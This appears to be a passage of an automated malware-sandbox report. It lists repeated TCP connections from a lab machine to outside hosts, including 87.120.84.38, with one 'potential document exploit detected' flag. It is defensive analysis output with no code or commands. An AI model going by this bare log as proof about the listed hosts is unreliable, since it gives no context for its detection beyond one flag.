Source: global traffic TCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
